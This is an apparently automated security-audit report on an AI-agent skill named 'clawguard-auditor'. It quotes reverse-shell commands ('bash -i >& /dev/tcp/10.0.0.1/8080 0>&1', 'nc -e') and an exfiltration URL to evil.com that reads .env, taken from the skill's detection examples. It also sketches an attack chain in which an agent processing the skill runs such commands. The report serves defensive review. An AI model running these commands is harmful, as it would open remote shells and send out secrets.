安全决策报告
clawguard-auditor
Security auditor skill contains embedded reverse shell patterns (nc -e, bash -i >& /dev/tcp) and data exfiltration examples (evil.com/?data=$(cat .env)) within documentation. No executable code files present, but the skill specification describes extensive capabilities (filesystem:WRITE, network:READ, shell:ADMIN) without implementation.
最直接的威胁证据
01
Skill masquerades as legitimate security auditor 初始入口 · SKILL.md
02
Documentation embeds reverse shell patterns as 'detection examples' weaponization · SKILL.md
03
AI agent extracts and interprets embedded patterns during skill processing exploitation · SKILL.md
为什么得出这个结论
2/4 个维度触发 通过
声明与实际能力
声明资源与推断能力基本一致。
阻止
隐藏执行与外联
提取到 2 个高危 IOC 或外联信号。
阻止
攻击链与高危发现
报告包含 4 步攻击链,另有 1 项高危或严重发现。
复核
依赖与供应链卫生
没有完整依赖信息,供应链判断需要保留弹性。
攻击链
01
Skill masquerades as legitimate security auditor
初始入口 · SKILL.md:1
02
Documentation embeds reverse shell patterns as 'detection examples'
weaponization · SKILL.md:55
03
AI agent extracts and interprets embedded patterns during skill processing
exploitation · SKILL.md:55
04
Potential execution of nc -e /dev/tcp or bash reverse shell commands
最终危害 · SKILL.md:55
风险分是怎么被拉高的
Embedded reverse shell patterns +20
SKILL.md:55 contains 'nc -e' and 'bash -i >& /dev/tcp' strings embedded in documentation
Data exfiltration example URL +10
SKILL.md:99 contains 'http://evil.com/?data=$(cat .env)' as detection example
Capabilities mismatch +8
Skill describes extensive capabilities (WRITE, ADMIN, NET_EGRESS) for documentation-only implementation
No executable files +-5
Absence of scripts/ directory, requirements.txt, or any code files reduces practical risk
Benign context +-3
Patterns appear in 'SAST Red Flag Hunt' section as detection examples
Documentation artifacts +-8
All files are Markdown/JSON with no executable code present
最关键的证据
高危
Embedded reverse shell command patterns
SKILL.md contains literal strings 'nc -e' and 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' at line 55 within a list of 'red flags to detect'. While in context these are examples, they represent dangerous patterns that could be extracted by prompt injection or interpreted by a compromised AI agent.
SKILL.md:55 Remove or escape dangerous patterns in documentation. Use generic descriptions like 'network connection backdoors' instead of literal command syntax.
中危
Data exfiltration pattern example
SKILL.md contains 'http://evil.com/?data=$(cat .env)' as an example of what the DLP engine should block. This embeds a real exfiltration technique as instructional content.
SKILL.md:99 Replace with generic description: 'URL parameter data exfiltration attempts'.
中危
Capabilities exceed implementation
The skill describes requiring CAP_FS_WRITE, CAP_NET_EGRESS, CAP_SYS_EXEC, and CAP_FS_READ_SENSITIVE capabilities, but no executable code files exist. This creates a mismatch between declared purpose and actual functionality.
SKILL.md:25 If this is documentation-only, declare NONE for all resource levels.
低危
Documentation-only implementation
All files are Markdown or JSON with no scripts/, requirements.txt, package.json, or any executable code. The skill is a specification without implementation.
SKILL.md:1 Verify if actual implementation files exist or are expected.
声明能力 vs 实际能力
文件系统 通过
声明 WRITE
→ 推断 NONE
SKILL.md describes CAP_FS_WRITE capability but no code exists to exercise it 网络访问 通过
声明 READ
→ 推断 NONE
SKILL.md describes NET_EGRESS token but no network code present 命令执行 通过
声明 ADMIN
→ 推断 NONE
No shell scripts or subprocess calls in any file 环境变量 通过
声明 READ
→ 推断 NONE
Mentions credential access but no code implements it 可疑产物与外联
严重 危险命令
nc -e SKILL.md:55
严重 危险命令
bash -i >& SKILL.md:55
中危 外部 URL
http://evil.com/?data=$(cat SKILL.md:99
依赖与供应链
没有结构化依赖告警。
文件构成
3 个文件 · 271 行
Markdown 2 个文件 · 263 行JSON 1 个文件 · 8 行
需关注文件 · 1
SKILL.md Embedded reverse shell command patterns · Data exfiltration pattern example · Capabilities exceed implementation · Documentation-only implementation · nc -e · bash -i >& · http://evil.com/?data=$(cat
其他文件 · README.md · _meta.json
安全亮点
No executable scripts or binary files present
No actual network connections or data exfiltration attempted
No credential harvesting code implemented
No base64-encoded payloads or obfuscated code
Patterns appear in documented 'detection examples' context rather than as instructions